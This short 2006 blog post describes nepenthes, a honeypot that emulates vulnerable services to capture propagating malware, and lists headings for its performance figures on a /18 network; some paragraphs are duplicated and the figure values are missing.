Nepenthes Scalability
Saturday, January 7. 2006
nepenthes is a versatile tool to capture propagating malware. The basic principle is the following: the tool simulates known vulnerabilities and waits for them to be exploited. Once nepenthes detects an exploitation attempt, it triggers the incoming exploit, and analyzes the incoming payload. This analysis leads to several information, which can be combined to download the malware from another computer system. Thus it is possible to download malware that tries topropagate within the network in an automated way.
Here are some figures that illustrate the scalability of nepenthes. These figures show the performance of nepenthes on a Pentium 4 with 2.6 GHz, 2 GB RAM, and a 100 MBit NIC. The corresponding machine listens to a /18 network (e.g. about 16K IPs) and simulates vulnerable services.
This data was captured on 2006-01-06.
Here are some figures that illustrate the scalability of nepenthes. These figures show the performance of nepenthes on a Pentium 4 with 2.6 GHz, 2 GB RAM, and a 100 MBit NIC. The corresponding machine listens to a /18 network (e.g. about 16K IPs) and simulates vulnerable services.
- Number of established connections:
- Number of logged downloads (i.e., download attempts):
- Number of logged submissions (i.e., successful downloads):
- Average load:
This data was captured on 2006-01-06.
".
